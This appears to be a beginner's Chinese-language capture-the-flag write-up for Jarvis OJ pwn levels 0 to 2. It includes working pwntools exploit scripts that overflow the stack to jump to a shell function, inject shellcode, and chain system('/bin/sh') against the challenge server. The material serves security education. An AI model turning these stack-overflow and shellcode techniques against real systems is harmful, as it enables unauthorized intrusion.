level0
首先我们先checksec一下level0文件,
可以尝试栈溢出
可以看到level0是64位文件,所以将level0拖入ida_x64,这类题简单,直接给出了system和/bin/sh
再查看vulnerable_function函数
同时,read可以读入0x200个字符,所以可以实现覆盖callsystem的地址
代码如下
from pwn import *
p = remote("pwn2.jarvisoj.com",9881)
d = 'a'*0x80
f = 'a'*8
sys_addr = 0x0000000000400596
payload = d+ f + p64(sys_addr)
p.send(payload)
p.interactive()
效果如下
level1
首先checksec level1
发现文件是32位的,还发现了nx保护是关闭的,将文件拖入ida32
发现并没有system,我们点vulnerable_function函数
发现了一个printf函数,综合来看可以执行shellcode
代码如下
from pwn import *
shellcode = asm(shellcraft.sh())
p = remote('pwn2.jarvisoj.com', 9877)
text = p.recvline()[14: -2]
buf_addr = int(text, 16)
payload = shellcode + '\x90' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)
p.send(payload)
p.interactive()
脚本执行
level2
第一步先checksec level2
level2是32位,就拖入32位ida
发现有system,进入字符串发现有bin/sh
再查看vulnerable_function函数
综上条件
脚本如下
from pwn import *
p = remote('pwn2.jarvisoj.com','9878')
elf = ELF('./level2')
sh_addr = elf.search('/bin/sh').next()
system_addr = elf.symbols['system']
exit_addr = elf.symbols['read']
payload = 'a' * (0x88 + 0x4) + p32(system_addr) + p32(exit_addr) + p32(sh_addr)
p.send(payload)
p.interactive()
效果如下
暂时先写到这,细节以后有时间补,小白所做,大佬绕过,新手食用。